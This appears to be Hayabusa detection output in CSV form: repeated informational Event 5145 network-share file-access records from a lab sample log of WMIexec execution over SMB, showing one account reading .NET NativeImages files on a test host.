10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# : IP Address: 
